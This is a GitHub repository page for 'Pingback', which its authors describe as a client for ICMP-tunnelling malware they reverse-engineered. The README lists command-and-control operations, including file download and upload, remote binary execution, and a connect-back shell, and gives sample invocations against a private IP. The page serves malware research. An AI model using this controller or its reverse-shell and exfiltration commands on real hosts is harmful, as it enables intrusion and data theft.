Skip to content

SpiderLabs/pingback

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Pingback

This is a client for a malware that we found and reversed engineered that uses ICMP tunneling techniques to evade detection. The VirusTotal report for this malware can be found here: https://www.virustotal.com/gui/file/e50943d9f361830502dcfdb00971cbee76877aa73665245427d817047523667f/detection

Installation

Linux

Currently only tested on Linux, as scapy sniffer didn't work correctly on Windows for us.

pip3 install -r requirements.txt

Usage

Usage: pingback.py [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  download   Downloads file from remote using mode 1.
  download3  Downloads file from remote using mode 3.
  exep       Execute binary on remote host
  shell      Run shell on remote host, this will tell the remote to connect...
  upload2    Uploads a file to the remote host using mode 2.

Simple Usage Examples

This requires obviously a target running the malware. e.g. if malware was running on 192.168.176.131 to run a shell on the target:

$ python3 pingback.py --host 192.168.176.131

This will listen on a random port on the local machine, send an icmp message to the target host with instructions to connect back to the local machine and random port, and establish a shell.

$ python3 pingback.py download --host 192.168.176.131 --remote_file c:\\windows\\system32\\win32calc.exe --local_file calc.exe

Demo

A demo has been made by my colleague @drole here

Authors and acknowledgement

Lloyd Macrohon [email protected] Rodel Mendrez [email protected]

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages